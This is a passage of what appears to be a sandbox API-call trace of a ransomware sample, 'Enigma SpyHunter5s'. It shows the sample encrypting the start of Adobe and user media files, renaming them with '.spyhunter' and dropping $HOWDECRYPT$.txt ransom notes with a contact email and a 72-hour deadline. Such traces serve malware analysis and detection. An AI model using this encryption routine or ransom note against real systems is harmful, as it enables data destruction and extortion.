(lpFirst="AdbeRdrUpd10116_MUI.msp", lpSrch=".txt") returned 0x0 [0147.131] GetProcessHeap () returned 0x2c0000 [0147.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.131] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cedc4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cedc4*=0x2800, lpOverlapped=0x0) returned 1 [0147.282] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.282] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cedc4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cedc4*=0x2800, lpOverlapped=0x0) returned 1 [0147.283] GetProcessHeap () returned 0x2c0000 [0147.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.283] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.283] WriteFile (in: hFile=0xb0, lpBuffer=0x25cee04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cedc4, lpOverlapped=0x0 | out: lpBuffer=0x25cee04*, lpNumberOfBytesWritten=0x25cedc4*=0x4, lpOverlapped=0x0) returned 1 [0147.283] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cedc4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cedc4*=0x30, lpOverlapped=0x0) returned 1 [0147.284] CloseHandle (hObject=0xb0) returned 1 [0147.285] GetProcessHeap () returned 0x2c0000 [0147.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.285] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.spyhunter") returned 80 [0147.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.spyhunter" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.spyhunter")) returned 1 [0147.286] GetProcessHeap () returned 0x2c0000 [0147.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.286] GetProcessHeap () returned 0x2c0000 [0147.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.286] GetProcessHeap () returned 0x2c0000 [0147.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2feeab8 | out: hHeap=0x2c0000) returned 1 [0147.286] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee00 | out: pbBuffer=0x25cee00) returned 1 [0147.286] GetProcessHeap () returned 0x2c0000 [0147.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.286] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cedf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cedf8*=0x30) returned 1 [0147.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0147.287] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned 69 [0147.287] StrStrW (lpFirst="AdbeRdrSecUpd10111.msp", lpSrch=".txt") returned 0x0 [0147.287] GetProcessHeap () returned 0x2c0000 [0147.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.287] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cedbc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cedbc*=0x2800, lpOverlapped=0x0) returned 1 [0147.288] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.289] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cedbc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cedbc*=0x2800, lpOverlapped=0x0) returned 1 [0147.289] GetProcessHeap () returned 0x2c0000 [0147.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.289] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.289] WriteFile (in: hFile=0xb0, lpBuffer=0x25cedfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cedbc, lpOverlapped=0x0 | out: lpBuffer=0x25cedfc*, lpNumberOfBytesWritten=0x25cedbc*=0x4, lpOverlapped=0x0) returned 1 [0147.290] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cedbc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cedbc*=0x30, lpOverlapped=0x0) returned 1 [0147.290] CloseHandle (hObject=0xb0) returned 1 [0147.290] GetProcessHeap () returned 0x2c0000 [0147.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.290] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.spyhunter") returned 79 [0147.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.spyhunter" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.spyhunter")) returned 1 [0147.291] GetProcessHeap () returned 0x2c0000 [0147.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.291] GetProcessHeap () returned 0x2c0000 [0147.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.292] GetProcessHeap () returned 0x2c0000 [0147.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee908 | out: hHeap=0x2c0000) returned 1 [0147.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.292] GetProcessHeap () returned 0x2c0000 [0147.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2d98 | out: hHeap=0x2c0000) returned 1 [0147.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.292] GetProcessHeap () returned 0x2c0000 [0147.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e538 | out: hHeap=0x2c0000) returned 1 [0147.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.292] GetProcessHeap () returned 0x2c0000 [0147.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee830 | out: hHeap=0x2c0000) returned 1 [0147.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.293] GetProcessHeap () returned 0x2c0000 [0147.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ffb0 | out: hHeap=0x2c0000) returned 1 [0147.293] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedf0 | out: pbBuffer=0x25cedf0) returned 1 [0147.293] GetProcessHeap () returned 0x2c0000 [0147.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.293] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cede8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cede8*=0x30) returned 1 [0147.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\.." (normalized: "c:\\users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.293] GetProcessHeap () returned 0x2c0000 [0147.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.293] GetProcessHeap () returned 0x2c0000 [0147.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d1930 | out: hHeap=0x2c0000) returned 1 [0147.293] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cede8 | out: pbBuffer=0x25cede8) returned 1 [0147.293] GetProcessHeap () returned 0x2c0000 [0147.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.293] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cede0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cede0*=0x30) returned 1 [0147.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\." (normalized: "c:\\users\\all users\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.294] GetProcessHeap () returned 0x2c0000 [0147.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.294] GetProcessHeap () returned 0x2c0000 [0147.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d18b0 | out: hHeap=0x2c0000) returned 1 [0147.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0147.294] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.294] WriteFile (in: hFile=0xb0, lpBuffer=0x25ced1b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cee44, lpOverlapped=0x0 | out: lpBuffer=0x25ced1b*, lpNumberOfBytesWritten=0x25cee44*=0x127, lpOverlapped=0x0) returned 1 [0147.295] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.295] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cee44, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cee44*=0x2ac, lpOverlapped=0x0) returned 1 [0147.295] CloseHandle (hObject=0xb0) returned 1 [0147.295] GetProcessHeap () returned 0x2c0000 [0147.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebfe80 | out: hHeap=0x2c0000) returned 1 [0147.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.480] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.480] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced17*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cee40, lpOverlapped=0x0 | out: lpBuffer=0x25ced17*, lpNumberOfBytesWritten=0x25cee40*=0x127, lpOverlapped=0x0) returned 1 [0147.481] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.481] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cee40, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cee40*=0x2ac, lpOverlapped=0x0) returned 1 [0147.481] CloseHandle (hObject=0xa0) returned 1 [0147.481] GetProcessHeap () returned 0x2c0000 [0147.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e478 | out: hHeap=0x2c0000) returned 1 [0147.481] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cede0 | out: pbBuffer=0x25cede0) returned 1 [0147.481] GetProcessHeap () returned 0x2c0000 [0147.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.481] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cedd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cedd8*=0x30) returned 1 [0147.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\SzdAEM8eCQstUHgxIfQ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\szdaem8ecqstuhgxifq.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.482] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\SzdAEM8eCQstUHgxIfQ.mp4") returned 84 [0147.482] StrStrW (lpFirst="SzdAEM8eCQstUHgxIfQ.mp4", lpSrch=".txt") returned 0x0 [0147.482] GetProcessHeap () returned 0x2c0000 [0147.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.482] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced9c*=0x2800, lpOverlapped=0x0) returned 1 [0147.483] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.483] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced9c*=0x2800, lpOverlapped=0x0) returned 1 [0147.483] GetProcessHeap () returned 0x2c0000 [0147.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.483] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.483] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceddc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced9c, lpOverlapped=0x0 | out: lpBuffer=0x25ceddc*, lpNumberOfBytesWritten=0x25ced9c*=0x4, lpOverlapped=0x0) returned 1 [0147.484] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced9c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced9c*=0x30, lpOverlapped=0x0) returned 1 [0147.484] CloseHandle (hObject=0xa0) returned 1 [0147.484] GetProcessHeap () returned 0x2c0000 [0147.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.484] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\SzdAEM8eCQstUHgxIfQ.mp4.spyhunter") returned 94 [0147.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\SzdAEM8eCQstUHgxIfQ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\szdaem8ecqstuhgxifq.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\SzdAEM8eCQstUHgxIfQ.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\szdaem8ecqstuhgxifq.mp4.spyhunter")) returned 1 [0147.485] GetProcessHeap () returned 0x2c0000 [0147.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.485] GetProcessHeap () returned 0x2c0000 [0147.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.485] GetProcessHeap () returned 0x2c0000 [0147.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efdc38 | out: hHeap=0x2c0000) returned 1 [0147.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedd8 | out: pbBuffer=0x25cedd8) returned 1 [0147.485] GetProcessHeap () returned 0x2c0000 [0147.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.485] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cedd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cedd0*=0x30) returned 1 [0147.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\R9qRr0N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\r9qrr0n.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.486] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\R9qRr0N.flv") returned 72 [0147.486] StrStrW (lpFirst="R9qRr0N.flv", lpSrch=".txt") returned 0x0 [0147.486] GetProcessHeap () returned 0x2c0000 [0147.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.486] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced94*=0x2800, lpOverlapped=0x0) returned 1 [0147.487] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.487] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced94*=0x2800, lpOverlapped=0x0) returned 1 [0147.487] GetProcessHeap () returned 0x2c0000 [0147.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.487] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.487] WriteFile (in: hFile=0xa0, lpBuffer=0x25cedd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced94, lpOverlapped=0x0 | out: lpBuffer=0x25cedd4*, lpNumberOfBytesWritten=0x25ced94*=0x4, lpOverlapped=0x0) returned 1 [0147.487] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced94, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced94*=0x30, lpOverlapped=0x0) returned 1 [0147.487] CloseHandle (hObject=0xa0) returned 1 [0147.487] GetProcessHeap () returned 0x2c0000 [0147.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.487] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\R9qRr0N.flv.spyhunter") returned 82 [0147.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\R9qRr0N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\r9qrr0n.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\R9qRr0N.flv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\r9qrr0n.flv.spyhunter")) returned 1 [0147.488] GetProcessHeap () returned 0x2c0000 [0147.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.488] GetProcessHeap () returned 0x2c0000 [0147.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.488] GetProcessHeap () returned 0x2c0000 [0147.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5818 | out: hHeap=0x2c0000) returned 1 [0147.488] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedd8 | out: pbBuffer=0x25cedd8) returned 1 [0147.489] GetProcessHeap () returned 0x2c0000 [0147.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, 